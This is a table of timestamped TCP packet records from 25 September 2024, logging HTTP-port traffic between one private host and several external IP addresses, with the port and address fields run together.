                                                                                  Sep 25, 2024 09:54:34.124773979 CEST8049755185.86.211.137192.168.11.20
                                                                                  Sep 25, 2024 09:54:34.124989986 CEST4975580192.168.11.20185.86.211.137
                                                                                  Sep 25, 2024 09:54:47.797482967 CEST4975580192.168.11.20185.86.211.137
                                                                                  Sep 25, 2024 09:54:57.623876095 CEST4975780192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:54:57.758538008 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:54:57.758842945 CEST4975780192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:54:57.764991999 CEST4975780192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:54:57.947089911 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:03.457561970 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:03.457662106 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:03.457737923 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:03.457815886 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:03.457928896 CEST4975780192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:55:03.457988024 CEST4975780192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:55:03.458161116 CEST4975780192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:55:03.599057913 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:03.599160910 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:03.599225044 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:03.599283934 CEST4975780192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:55:03.599489927 CEST4975780192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:55:03.603563070 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:03.603806019 CEST4975780192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:55:03.740366936 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:03.740401030 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:03.740581036 CEST4975780192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:55:03.745310068 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:03.745640993 CEST4975780192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:55:03.881901026 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:03.886369944 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:03.886465073 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:03.886528969 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:03.886563063 CEST4975780192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:55:03.886771917 CEST4975780192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:55:04.027533054 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:04.027605057 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:04.027653933 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:04.027700901 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:04.027811050 CEST4975780192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:55:04.027988911 CEST4975780192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:55:04.030857086 CEST4975780192.168.11.20208.91.197.27
                                                                                  Sep 25, 2024 09:55:04.165658951 CEST8049757208.91.197.27192.168.11.20
                                                                                  Sep 25, 2024 09:55:14.236366987 CEST4975880192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:14.340679884 CEST804975813.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:14.341029882 CEST4975880192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:14.348584890 CEST4975880192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:14.452018976 CEST804975813.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:14.453141928 CEST804975813.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:14.453388929 CEST4975880192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:15.855030060 CEST4975880192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:15.960272074 CEST804975813.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:16.872900009 CEST4975980192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:16.977361917 CEST804975913.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:16.977567911 CEST4975980192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:16.985219955 CEST4975980192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:17.088793039 CEST804975913.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:17.089382887 CEST804975913.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:17.089560986 CEST4975980192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:18.494982004 CEST4975980192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:18.599210978 CEST804975913.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:19.512634039 CEST4976080192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:19.616997004 CEST804976013.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:19.617340088 CEST4976080192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:19.625036955 CEST4976080192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:19.728497028 CEST804976013.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:19.728585005 CEST804976013.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:19.728643894 CEST804976013.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:19.728704929 CEST804976013.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:19.728843927 CEST804976013.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:19.728985071 CEST804976013.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:22.152630091 CEST4976180192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:22.258761883 CEST804976113.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:22.259068012 CEST4976180192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:22.264098883 CEST4976180192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:22.368486881 CEST804976113.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:22.369791985 CEST804976113.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:22.369885921 CEST804976113.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:22.370206118 CEST4976180192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:22.372066975 CEST4976180192.168.11.2013.248.169.48
                                                                                  Sep 25, 2024 09:55:22.477318048 CEST804976113.248.169.48192.168.11.20
                                                                                  Sep 25, 2024 09:55:27.560062885 CEST4976280192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:27.662559986 CEST80497623.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:27.662862062 CEST4976280192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:27.670301914 CEST4976280192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:27.772866964 CEST80497623.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:27.774024010 CEST80497623.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:27.774353027 CEST4976280192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:29.180136919 CEST4976280192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:29.283478975 CEST80497623.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:30.199776888 CEST4976380192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:30.302237034 CEST80497633.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:30.302587986 CEST4976380192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:30.310297012 CEST4976380192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:30.412683964 CEST80497633.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:30.415070057 CEST80497633.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:30.415380955 CEST4976380192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:31.820128918 CEST4976380192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:31.922312021 CEST80497633.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:32.837743044 CEST4976480192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:32.972023010 CEST80497643.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:32.972208023 CEST4976480192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:32.979851961 CEST4976480192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:32.979970932 CEST4976480192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:33.099163055 CEST80497643.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:33.099235058 CEST80497643.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:33.099307060 CEST80497643.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:33.099390984 CEST80497643.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:33.099467039 CEST80497643.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:33.099529982 CEST80497643.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:33.099606037 CEST80497643.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:34.491492987 CEST4976480192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:34.638178110 CEST80497643.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:35.509215117 CEST4976580192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:35.611661911 CEST80497653.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:35.611977100 CEST4976580192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:35.617120028 CEST4976580192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:35.719392061 CEST80497653.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:35.722799063 CEST80497653.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:35.722866058 CEST80497653.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:35.723129034 CEST4976580192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:35.725122929 CEST4976580192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:35.729693890 CEST80497653.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:35.729907036 CEST4976580192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:35.827383995 CEST80497653.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:40.936280012 CEST4976680192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:41.057610035 CEST80497663.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:41.057859898 CEST4976680192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:41.065438986 CEST4976680192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:41.168329954 CEST80497663.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:41.198028088 CEST80497663.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:41.198251009 CEST4976680192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:42.567882061 CEST4976680192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:42.675168037 CEST80497663.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:43.585367918 CEST4976780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:43.690615892 CEST80497673.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:43.690866947 CEST4976780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:43.699075937 CEST4976780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:43.801405907 CEST80497673.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:43.804404974 CEST80497673.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:43.804630995 CEST4976780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:45.207940102 CEST4976780192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:45.315375090 CEST80497673.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:46.225522995 CEST4976880192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:46.332597971 CEST80497683.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:46.332940102 CEST4976880192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:46.340452909 CEST4976880192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:46.340565920 CEST4976880192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:46.442845106 CEST80497683.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:46.442960024 CEST80497683.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:46.443007946 CEST80497683.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:46.443093061 CEST80497683.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:46.443136930 CEST80497683.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:46.443176985 CEST80497683.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:46.443217993 CEST80497683.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:46.445192099 CEST80497683.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:46.445414066 CEST4976880192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:47.848124981 CEST4976880192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:47.962409973 CEST80497683.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:48.865644932 CEST4976980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:48.968897104 CEST80497693.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:48.969120979 CEST4976980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:48.974328041 CEST4976980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:49.087424040 CEST80497693.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:49.087491035 CEST80497693.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:49.087541103 CEST80497693.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:49.087939978 CEST4976980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:49.089867115 CEST4976980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:49.090213060 CEST80497693.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:49.090383053 CEST4976980192.168.11.203.33.130.190
                                                                                  Sep 25, 2024 09:55:49.192543030 CEST80497693.33.130.190192.168.11.20
                                                                                  Sep 25, 2024 09:55:54.278060913 CEST4977080192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:55:54.501084089 CEST804977084.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:55:54.501317978 CEST4977080192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:55:54.508985996 CEST4977080192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:55:54.731964111 CEST804977084.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:55:54.732391119 CEST804977084.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:55:57.035537958 CEST4977180192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:55:57.261657953 CEST804977184.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:55:57.261848927 CEST4977180192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:55:57.269597054 CEST4977180192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:55:57.495978117 CEST804977184.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:55:57.496409893 CEST804977184.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:55:59.800614119 CEST4977280192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:56:00.027560949 CEST804977284.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:56:00.027724028 CEST4977280192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:56:00.035566092 CEST4977280192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:56:00.035625935 CEST4977280192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:56:00.262633085 CEST804977284.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:56:00.262645960 CEST804977284.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:56:02.565567970 CEST4977380192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:56:02.789426088 CEST804977384.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:56:02.789614916 CEST4977380192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:56:02.794814110 CEST4977380192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:56:03.018704891 CEST804977384.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:56:03.019337893 CEST804977384.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:56:03.019610882 CEST804977384.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:56:03.019623041 CEST804977384.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:56:03.019638062 CEST804977384.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:56:03.019697905 CEST804977384.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:56:03.019712925 CEST804977384.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:56:03.019725084 CEST804977384.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:56:03.019737005 CEST804977384.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:56:03.019748926 CEST804977384.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:56:03.019879103 CEST4977380192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:56:03.020050049 CEST4977380192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:56:03.023170948 CEST4977380192.168.11.2084.32.84.32
                                                                                  Sep 25, 2024 09:56:03.246772051 CEST804977384.32.84.32192.168.11.20
                                                                                  Sep 25, 2024 09:56:08.290968895 CEST4977480192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:56:08.460832119 CEST804977454.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:56:08.461075068 CEST4977480192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:56:08.468861103 CEST4977480192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:56:08.638156891 CEST804977454.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:56:08.638649940 CEST804977454.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:56:08.638662100 CEST804977454.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:56:08.638847113 CEST4977480192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:56:09.983627081 CEST4977480192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:56:11.001238108 CEST4977580192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:56:11.171356916 CEST804977554.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:56:11.171631098 CEST4977580192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:56:11.179272890 CEST4977580192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:56:11.351476908 CEST804977554.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:56:11.351583004 CEST804977554.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:56:11.351624012 CEST804977554.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:56:11.351769924 CEST4977580192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:56:12.686167002 CEST4977580192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:56:13.704216957 CEST4977680192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:56:13.874574900 CEST804977654.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:56:13.874984980 CEST4977680192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:56:13.890320063 CEST4977680192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:56:13.890372038 CEST4977680192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:56:13.890443087 CEST4977680192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:56:14.071825981 CEST804977654.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:56:14.071840048 CEST804977654.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:56:14.071847916 CEST804977654.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:56:14.071858883 CEST804977654.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:56:14.071868896 CEST804977654.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:56:14.072052956 CEST4977680192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:56:15.404390097 CEST4977680192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:56:16.421968937 CEST4977780192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:56:16.601973057 CEST804977754.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:56:16.602238894 CEST4977780192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:56:16.607481956 CEST4977780192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:56:16.777904987 CEST804977754.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:56:16.778028011 CEST804977754.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:56:16.778040886 CEST804977754.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:56:16.778281927 CEST4977780192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:56:16.780206919 CEST4977780192.168.11.2054.67.87.110
                                                                                  Sep 25, 2024 09:56:16.950069904 CEST804977754.67.87.110192.168.11.20
                                                                                  Sep 25, 2024 09:56:22.148690939 CEST4977880192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 09:56:22.379400969 CEST8049778194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 09:56:22.379559994 CEST4977880192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 09:56:22.387228012 CEST4977880192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 09:56:22.618385077 CEST8049778194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 09:56:22.618781090 CEST8049778194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 09:56:22.618799925 CEST8049778194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 09:56:22.618907928 CEST8049778194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 09:56:22.618921995 CEST8049778194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 09:56:22.619000912 CEST4977880192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 09:56:22.619019985 CEST4977880192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 09:56:23.902441978 CEST4977880192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 09:56:24.922310114 CEST4977980192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 09:56:25.152213097 CEST8049779194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 09:56:25.152465105 CEST4977980192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 09:56:25.166872025 CEST4977980192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 09:56:25.396936893 CEST8049779194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 09:56:25.400648117 CEST8049779194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 09:56:25.400834084 CEST8049779194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 09:56:25.400845051 CEST8049779194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 09:56:25.401134968 CEST4977980192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 09:56:25.401134968 CEST4977980192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 09:56:25.401263952 CEST8049779194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 09:56:25.401439905 CEST4977980192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 09:56:26.683140039 CEST4977980192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 09:56:27.701067924 CEST4978080192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 09:56:27.930567980 CEST8049780194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 09:56:27.930840969 CEST4978080192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 09:56:27.938630104 CEST4978080192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 09:56:27.938663006 CEST4978080192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 09:56:28.168466091 CEST8049780194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 09:56:28.168478966 CEST8049780194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 09:56:28.168648005 CEST4978080192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 09:56:28.173607111 CEST8049780194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 09:56:28.173616886 CEST8049780194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 09:56:28.173904896 CEST8049780194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 09:56:28.174053907 CEST8049780194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 09:56:28.174067020 CEST8049780194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 09:56:28.174158096 CEST4978080192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 09:56:28.174228907 CEST4978080192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 09:56:28.174326897 CEST4978080192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 09:56:28.399305105 CEST8049780194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 09:56:28.399318933 CEST8049780194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 09:56:28.399913073 CEST4978080192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 09:56:29.448127031 CEST4978080192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 09:56:30.465797901 CEST4978180192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 09:56:30.697305918 CEST8049781194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 09:56:30.697513103 CEST4978180192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 09:56:30.702748060 CEST4978180192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 09:56:30.934298992 CEST8049781194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 09:56:30.934695005 CEST8049781194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 09:56:30.934844971 CEST8049781194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 09:56:30.934864998 CEST8049781194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 09:56:30.934876919 CEST8049781194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 09:56:30.934889078 CEST8049781194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 09:56:30.934902906 CEST8049781194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 09:56:30.934919119 CEST8049781194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 09:56:30.934930086 CEST8049781194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 09:56:30.934941053 CEST8049781194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 09:56:30.935034990 CEST4978180192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 09:56:30.935072899 CEST4978180192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 09:56:30.935072899 CEST4978180192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 09:56:30.935208082 CEST4978180192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 09:56:30.937115908 CEST4978180192.168.11.20194.58.112.174
                                                                                  Sep 25, 2024 09:56:31.168631077 CEST8049781194.58.112.174192.168.11.20
                                                                                  Sep 25, 2024 09:56:36.076962948 CEST4978280192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 09:56:36.398169994 CEST804978238.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 09:56:36.398412943 CEST4978280192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 09:56:36.406135082 CEST4978280192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 09:56:36.730237007 CEST804978238.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 09:56:36.730251074 CEST804978238.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 09:56:36.730349064 CEST804978238.47.207.146192.168.11.20
                                                                                  Sep 25, 2024 09:56:36.730542898 CEST4978280192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 09:56:37.915015936 CEST4978280192.168.11.2038.47.207.146
                                                                                  Sep 25, 2024 09:56:38.932559967 CEST4978380192.168.11.2038.47.207.146
